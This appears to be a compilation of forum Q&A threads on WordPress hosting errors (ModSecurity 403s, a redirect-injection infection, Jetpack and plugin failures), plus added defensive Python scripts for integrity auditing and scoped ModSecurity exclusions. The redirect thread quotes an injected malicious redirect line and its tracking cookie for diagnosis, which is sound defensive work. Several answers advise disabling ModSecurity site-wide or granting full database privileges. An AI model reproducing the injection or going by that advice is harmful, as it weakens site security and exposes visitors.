403 error in Wordpress 4.0 options.php - wordpress

I want to disable comments site-wide on a Wordpress site, but I keep getting this one annoying problem.
I've looked around and all of the results are for older versions of Wordpress. I have a fresh install of Wordpress 4.0 onto a namecheap hosting server.
When I try to disable comments in Settings > Discussion by unchecking the box and clicking on the submit button below, I get redirected to a page that says:
You don't have permission to access /wp/wp-admin/options.php on this
server.
Additionally, a 404 Not Found error was encountered while trying to
use an ErrorDocument to handle the request.
One suggestion from a few threads from 5-7 years ago was to modify the .htaccess and permissions. I tried, it still is returning the same error. Those suggestions were for older, less secure versions of Wordpress, so I'm thinking there should be a different workaround for 4.0. I also for some reason don't have SSH access to the server, probably because of some stupid namecheap / cpanel restriction.

I went ahead and contacted namecheap directly and they corrected it quickly - I don't think there's anything you can do. Specifically, they said:
We have whitelisted Mod Security rule which has been triggered. Please try to perform necessary actions one more time.
Hope that helps.

Check the privileges of your WordPress database users.
Also check file & folder permissions.
(folder permission 755 and file permission 644)

Related

WordPress site impacted with redirect injection

I have a website that is running on an AWS server using the Bitnami Nginx and WordPress image.
https://www.athleticclubhk.com/
Recently it got all our ads on Google stopped due to malicious content. Oddly, this time it's trickier than your standard malware of infected files. When visiting the site incognito, the first and only the first link click gets redirected using the following code:
window.location.replace("https://cartoonmines.com/scount");window.location.href = "https://cartoonmines.com/scount";
This is being injected on any link; however, upon investigating the loaded code on inspect, it's not injecting it into the page.
I've tried to hunt down the theme, plugins, core files and found nothing!
I replaced and reinstalled WordPress core files, deactivated all plugins and even swapped the theme - the problem is still there. I can't find any hidden .htaccess file in the entire root directory.
I even used GREP to try to look for anything fishy (any clues here that someone can help with?) nothing so far.
The site is still impacted with this so you can easily load the link ~ I do use Malwarebytes to keep myself protected, in case you are opening this directly.
Can anyone help?
The redirection code is implanted to /wp-includes/js/wp-emoji-release.min.js.
How to confirm:
watch the cookies when clicking internal page, a new cookie is being set for tracking first clicks, named ht_rr
save complete webpage locally and try to load it, and check in Chrome dev tools, you'll see that in Console tab it complains about this Javascript file attempting to set the aforementioned cookie
While a temporary resolution of deleting the file will fix things for some time...
There's no excuse for not setting up a proper server stack. Bitnami or other "great stacks" won't cut it security-wise. They exist for "fast", but no "quality" setup, and of course, it's never going to be secure.
The file got created somehow / had write privileges. This indicates a problem with the setup most of the time. Unless you're using some nulled plugins or plugins from bad sources.
Once again, since the website was essentially "pwned", deleting the Javascript file does not mean complete disinfection. To preserve things in a secure state, I would recommend setting things on a clean server environment with strict PHP-FPM permissions aka "lockdown" chmod, and look for write errors to look for infected PHP files.
Check out some guides on the matter of secure NGINX/PHP-FPM setup:
NGINX and PHP-FPM. What my permissions should be?
Best practice secure NGINX configuration for WordPress
NGINX Security Headers, the right way
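An added example, not part of the original answers: a core-file integrity audit that would surface an implant like the one reported in /wp-includes/js/wp-emoji-release.min.js. It compares a tree against a path-to-MD5 manifest and scans JavaScript for the two indicators named above (the ht_rr cookie and the window.location.replace call). The manifest, the temporary tree and all function names are constructed here; on a real site the manifest would come from a trusted source of core checksums for the installed version.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Indicators named in the thread: the tracking cookie and the redirect call.
INDICATORS = [re.compile(rb"ht_rr"), re.compile(rb"window\.location\.replace\(")]
CORE_DIRS = ("wp-admin/", "wp-includes/")


def audit_core(wp_root: Path, checksums: dict) -> dict:
    """Compare a WordPress tree with a {relative_path: md5} manifest."""
    report = {"modified": [], "missing": [], "unexpected": [], "indicator_hits": []}
    for rel, expected in sorted(checksums.items()):
        target = wp_root / rel
        if not target.is_file():
            report["missing"].append(rel)
        elif hashlib.md5(target.read_bytes()).hexdigest() != expected:
            report["modified"].append(rel)
    for path in sorted(f for f in wp_root.rglob("*") if f.is_file()):
        rel = path.relative_to(wp_root).as_posix()
        # A file inside a core directory that the manifest does not list.
        if rel.startswith(CORE_DIRS) and rel not in checksums:
            report["unexpected"].append(rel)
        # JavaScript containing either indicator, wherever it lives.
        if path.suffix == ".js" and any(pat.search(path.read_bytes()) for pat in INDICATORS):
            report["indicator_hits"].append(rel)
    return report


def demo() -> dict:
    """Build a constructed two-file tree, tamper with it, and audit it."""
    emoji = "wp-includes/js/wp-emoji-release.min.js"
    clean = {emoji: b"/* constructed clean file */", "wp-includes/version.php": b"<?php // constructed"}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in clean.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(body)
        manifest = {rel: hashlib.md5(body).hexdigest() for rel, body in clean.items()}
        # Simulate the implant with an inert string that only sets the cookie name.
        (root / emoji).write_bytes(clean[emoji] + b'document.cookie="ht_rr=1";')
        (root / "wp-includes/js/extra.js").write_bytes(b"// constructed stray file")
        return audit_core(root, manifest)


if __name__ == "__main__":
    print(demo())
```

WP-CLI's `wp core verify-checksums` performs the same kind of manifest comparison against the official core checksums.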
Just had the same problem and it was Zend Font Plugin, the same that some people mentioned before.
Installed Wordfence and this came out. Deleted the plugin and now the site is working perfectly.
Disable plugins and check again.
Change the database username and password.
Ask the hosting manager to check the host.

cPanel - send 404 to a php page?

I have an issue in a WordPress site on Hostgator where the htaccess file keeps disappearing. Before you get all, "Check your plugins, dummy" I have the same install of this site running on a completely separate Hostgator account and it's running fine. Furthermore, I have a local instance which, again, is running fine. So if it was a plugin, the issue would be replicated on the other instances, but it's not.
My suspicion is someone who has access to the hosting account is tampering with it. While that sounds paranoid, I can't rule anything out because htaccess files don't just delete themselves.
The bandaid fix has been to just reset permalinks once the site goes down. Annoying, but simple. What might be even neater would be to set my server 404 page to a php script that, when accessed, hits an endpoint I set up in WordPress to programmatically flush the rewrite rules, thus restoring the htaccess page, and then the 404 tries to forward them on again. However, the suggestions on how to do this say putting the error page definitions in the htaccess page. Which doesn't do me much good if the htaccess page is being deleted.
How stupid is this idea? Please let me know in comments.
I'm open to other solutions, but I'm waiting on my hosting support to figure out how the file is being deleted because I assume others with the account info are tampering.

The Jetpack server was unable to communicate with your site - Wordpress

I am using WordPress hosted on Bluehost.
After activating Jetpack and clicking the "connect to wordpress.com" button, I see this error:
site_inaccessible
The Jetpack server was unable to communicate with your site [HTTP 404]. Ask your web host if they allow connections from WordPress.com. If you need further assistance, contact Jetpack Support: http://jetpack.me/support/
I had this issue because I have installed iThemes Security plug-in. To solve the problem :
Disable it.
Connect JetPack
Enable it and look what exactly in the config is making the problem.
Probably other security plug-ins/firewalls will have the same effect.
The Jetpack plugin error in WordPress occurs because ModSecurity is enabled in cPanel and the xmlrpc rule has not been added to the .htaccess file.
First disable ModSecurity for the domain from cPanel.
Log into cPanel
Under Security choose ModSecurity
Under Configure Individual Domains, Switch affected On or Off (For all domains, ModSecurity is On by default)
Add xmlrpc.php requests rule in .htaccess
<Files "xmlrpc.php">
Order Allow,Deny
Allow from all
</Files>
And check whether xmlrpc is working or not
http://example.com/xmlrpc.php
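An added example, not from any of the posts: both the 403 on /wp/wp-admin/options.php in the first thread and the cPanel toggle above come down to a ModSecurity rule firing, and the narrower fix is the one the host applied there, whitelisting the single rule that triggered. This sketch pulls the rule id for one URI out of error-log lines and builds an exclusion scoped to that URI; it assumes the ModSecurity 2.x log-tag format and that the server administrator applies the result in the server configuration, and the log lines, rule ids and function names are constructed.

```python
import re
from collections import Counter

# Constructed log lines in the ModSecurity 2.x / Apache error-log style.
# Rule ids, client addresses and messages are invented for this example.
SAMPLE_LOG = """\
[Tue Oct 07 10:15:32 2014] [error] [client 203.0.113.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "x" at ARGS:blogname. [file "/etc/modsec/rules.conf"] [line "45"] [id "900001"] [msg "Constructed rule A"] [hostname "example.com"] [uri "/wp/wp-admin/options.php"] [unique_id "a1"]
[Tue Oct 07 10:16:02 2014] [error] [client 203.0.113.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "x" at ARGS:blogname. [file "/etc/modsec/rules.conf"] [line "45"] [id "900001"] [msg "Constructed rule A"] [hostname "example.com"] [uri "/wp/wp-admin/options.php"] [unique_id "a2"]
[Tue Oct 07 10:20:41 2014] [error] [client 198.51.100.9] ModSecurity: Access denied with code 403 (phase 1). Match of "x" against "REQUEST_URI" required. [file "/etc/modsec/rules.conf"] [line "80"] [id "900002"] [msg "Constructed rule B"] [hostname "example.com"] [uri "/xmlrpc.php"] [unique_id "a3"]
[Tue Oct 07 10:21:00 2014] [error] [client 198.51.100.9] File does not exist: /home/user/public_html/404.shtml
"""

# Matches the trailing [name "value"] tags ModSecurity appends to each message.
TAG = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')


def denials(log_text):
    """Yield the tag dict of every ModSecurity 'Access denied' line."""
    for line in log_text.splitlines():
        if "ModSecurity: Access denied" in line:
            yield dict(TAG.findall(line))


def rules_for_uri(log_text, uri):
    """Count which rule ids blocked requests to one exact URI."""
    return Counter(t["id"] for t in denials(log_text) if t.get("uri") == uri and "id" in t)


def scoped_exclusion(uri, rule_ids):
    """Build an Apache block that disables only these rules, only on this URI."""
    lines = [f'<LocationMatch "^{re.escape(uri)}$">']
    lines += [f"    SecRuleRemoveById {rid}" for rid in sorted(rule_ids)]
    lines.append("</LocationMatch>")
    return "\n".join(lines)


if __name__ == "__main__":
    hits = rules_for_uri(SAMPLE_LOG, "/wp/wp-admin/options.php")
    print(hits)
    print(scoped_exclusion("/wp/wp-admin/options.php", hits))
```

Every other rule stays active for the rest of the site, unlike switching ModSecurity off for the whole domain.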
I deactivated all plugins and uninstalled Jetpack; after reinstalling Jetpack it works successfully. Thanks to all.
In your case, a security plugin or your host may be blocking access to this file. As long as this is the case, you won't be able to use Jetpack, or any other app or plugin using the XML-RPC file.
yourblog/wordpress/xmlrpc.php
Could you try to deactivate all security plugins, and if that doesn't help, contact your hosting provider and ask them if they block access to the URL above?
Thanks,
Rahul
I have tried all types of workarounds and none has solved it, even the one above. At least for me.
What I found, comparing with other running websites I have, was that this one, which is a new installation, had a strange folder within the installation folder.
A folder called ".didb"; I had never heard of it, and there were several text files within. I searched online to see if it was something important to have on the server; nothing clear found.
So guess what I did. Deleted the sweet folder and boom. It is working perfectly well now.
Sorry, I don't have the names of the files and folders within, and to be honest, I don't want to know; all I want to know is whether the website is working with the files I want, which is WordPress only.
So, you may have a similar situation, take a look under your high level folder via FTP or whichever other way you may want to and that could save the day. ;-)

Wordpress: attempting to update plugins results in 503 error after several minutes

I'm using wp 3.4.2 on a hosting service. I can access the ftp server and make changes using an ftp client (i.e. I have the correct credentials). I inherited the website and I'm trying to update everything, but as a precaution I started with the plugins.
The problem
When I try to update a plugin using the admin dashboard, after clicking "update now", the page keeps loading for several (about/at least 5) minutes. Afterwards I get an Error 503 Service Unavailable error. FTP settings are hardcoded in wp-config.php. This happens with all the plugins.
I solved it already, answer below.
In case anyone happens to stumble upon this problem, in wp-config.php the ftp host should be set to localhost instead of ftp://yourdomain.com.
Another solution I found on my webhost was that the database user the WordPress installation used lacked the permissions to reference and to delete. Solved by giving the DB user FULL access.

How to resolve a bad plugin server 500 error wordpress

I was just working on a Wordpress site and after updating a plug-in (which had not yet been activated, only installed) I activated it. Instead of the activation working, it gave me this error:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster#ibsmithmedia.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.
I am getting this error on every page of my wordpress site, not just the plugin page or my user admin area.
How can I fix this? Is there a way to undo this plugin activation (I'm pretty sure it's what's causing the issue).
I don't have access to the actual FTP files of the site, I'm working on it for a friend. But I can get access if that's the only way to fix this. Thanks!
I would get access and delete the plugin.
That would be the fastest solution.
I ended up having to delete the folder for the plugin and then going to my htaccess file and remove extra lines that the plugin had added there as well. That resolved the issue.
First you need to connect to your website using FTP client, or File Manager in cPanel. Once connected, you need to navigate to the /wp-content/ folder.
Inside wp-content folder, you will see a folder called plugins. This is where WordPress stores all plugins installed on your website.
Right click on the plugins folder and select Rename. Change the name of the plugins folder to anything that you like. In our example, we will call it “plugins.deactivate”. Once you do this, all of your plugins will be deactivated.
Usually, this method is used when you are locked out of your admin area. If the issue was with your plugins, then you should be able to log in to your WordPress admin area.
Once you do that, go back to your /wp-content/ folder and rename “plugins.deactivate” back to plugins.
Now you can activate one plugin at a time until your site breaks again. At which point, you will know exactly which plugin caused the issue.
